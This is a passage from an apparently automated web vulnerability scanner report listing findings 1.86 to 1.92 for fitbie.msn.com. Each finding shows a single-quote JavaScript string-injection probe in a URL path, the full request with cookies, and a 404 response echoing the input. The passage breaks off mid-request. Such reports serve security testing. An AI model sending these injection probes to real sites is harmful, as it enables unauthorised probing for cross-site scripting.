User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:57 +0000
ETag: "1297607397-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:58 GMT
Date: Sun, 13 Feb 2011 14:29:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default47b04';ea0f9356189?destination=node%2Fdefault47b04';ea0f9356189&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.86. http://fitbie.msn.com/sites/default/files/dbell_cross_lunge_B-female-th_1.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/dbell_cross_lunge_B-female-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48bac'%3b139573ad8a6 was submitted in the REST URL parameter 2. This input was echoed as 48bac';139573ad8a6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default48bac'%3b139573ad8a6/files/dbell_cross_lunge_B-female-th_1.jpg?1293054510 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:01 +0000
ETag: "1297607401-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:30:01 GMT
Date: Sun, 13 Feb 2011 14:30:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default48bac';139573ad8a6?destination=node%2Fdefault48bac';139573ad8a6&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.87. http://fitbie.msn.com/sites/default/files/dumb-ly-tri-ext-B-female-th_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/dumb-ly-tri-ext-B-female-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fd51'%3b75c867689ec was submitted in the REST URL parameter 2. This input was echoed as 8fd51';75c867689ec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default8fd51'%3b75c867689ec/files/dumb-ly-tri-ext-B-female-th_0.jpg?1293052760 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:01 +0000
ETag: "1297607401-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:02 GMT
Date: Sun, 13 Feb 2011 14:30:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default8fd51';75c867689ec?destination=node%2Fdefault8fd51';75c867689ec&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.88. http://fitbie.msn.com/sites/default/files/ez_ly_tri_ext_A-male-th_1.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/ez_ly_tri_ext_A-male-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41641'%3bcab9174a1da was submitted in the REST URL parameter 2. This input was echoed as 41641';cab9174a1da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default41641'%3bcab9174a1da/files/ez_ly_tri_ext_A-male-th_1.jpg?1287431969 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:31 GMT
Date: Sun, 13 Feb 2011 14:26:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default41641';cab9174a1da?destination=node%2Fdefault41641';cab9174a1da&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.89. http://fitbie.msn.com/sites/default/files/flat_belly_diet_men_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/flat_belly_diet_men_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 178f5'%3bdbeb75eb455 was submitted in the REST URL parameter 2. This input was echoed as 178f5';dbeb75eb455 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default178f5'%3bdbeb75eb455/files/flat_belly_diet_men_th.jpg?1285852783 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:46 +0000
ETag: "1297607206-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:47 GMT
Date: Sun, 13 Feb 2011 14:26:47 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default178f5';dbeb75eb455?destination=node%2Fdefault178f5';dbeb75eb455&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.90. http://fitbie.msn.com/sites/default/files/flat_belly_diet_women_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/flat_belly_diet_women_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed2bc'%3be5e3251fd63 was submitted in the REST URL parameter 2. This input was echoed as ed2bc';e5e3251fd63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaulted2bc'%3be5e3251fd63/files/flat_belly_diet_women_th.jpg?1285868226 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:45 +0000
ETag: "1297607205-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:46 GMT
Date: Sun, 13 Feb 2011 14:26:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulted2bc';e5e3251fd63?destination=node%2Fdefaulted2bc';e5e3251fd63&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.91. http://fitbie.msn.com/sites/default/files/guilty-chocolate-snack-th_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/guilty-chocolate-snack-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3ee'%3b24104870631 was submitted in the REST URL parameter 2. This input was echoed as ea3ee';24104870631 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultea3ee'%3b24104870631/files/guilty-chocolate-snack-th_0.jpg?1297454792 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:10 +0000
ETag: "1297607170-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:11 GMT
Date: Sun, 13 Feb 2011 14:26:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultea3ee';24104870631?destination=node%2Fdefaultea3ee';24104870631&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.92. http://fitbie.msn.com/sites/default/files/home-workout-dumbbells-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/home-workout-dumbbells-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 226f4'%3bc8e94e44f55 was submitted in the REST URL parameter 2. This input was echoed as 226f4';c8e94e44f55 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default226f4'%3bc8e94e44f55/files/home-workout-dumbbells-th.jpg?1294621763 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
